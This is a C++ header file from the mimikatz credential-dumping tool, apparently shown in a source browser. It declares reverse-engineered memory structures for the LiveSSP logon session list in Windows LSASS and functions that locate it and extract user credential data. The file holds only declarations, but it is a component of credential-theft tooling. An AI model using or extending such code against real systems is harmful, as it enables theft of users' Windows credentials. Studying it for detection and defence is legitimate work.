blob: 891da63275b71c76f18754c578331c9e1349c770 (
plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
|
/* Benjamin DELPY `gentilkiwi`
http://blog.gentilkiwi.com
benjamin@gentilkiwi.com
Licence : http://creativecommons.org/licenses/by/3.0/fr/
Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
*/
#pragma once
#include "../mod_mimikatz_sekurlsa.h"
class mod_mimikatz_sekurlsa_livessp {
private:
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL
{
DWORD isSupp; // 88h
DWORD unk0;
KIWI_GENERIC_PRIMARY_CREDENTIAL credentials;
} KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;
typedef struct _KIWI_LIVESSP_LIST_ENTRY
{
struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
PVOID unk0; // 1
PVOID unk1; // 0FFFFFFFFh
PVOID unk2; // 0FFFFFFFFh
PVOID unk3; // 0
DWORD unk4; // 0
DWORD unk5; // 0
PVOID unk6; // 20007D0h
LUID LocallyUniqueIdentifier;
LSA_UNICODE_STRING UserName;
PVOID unk7; // 2000010Dh
PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
} KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;
static PKIWI_LIVESSP_LIST_ENTRY LiveGlobalLogonSessionList;
static bool searchLiveGlobalLogonSessionList();
public:
static mod_process::PKIWI_VERY_BASIC_MODULEENTRY pModLIVESSP;
static bool getLiveSSP(vector<wstring> * arguments);
static bool WINAPI getLiveSSPLogonData(__in PLUID logId, __in bool justSecurity);
};
|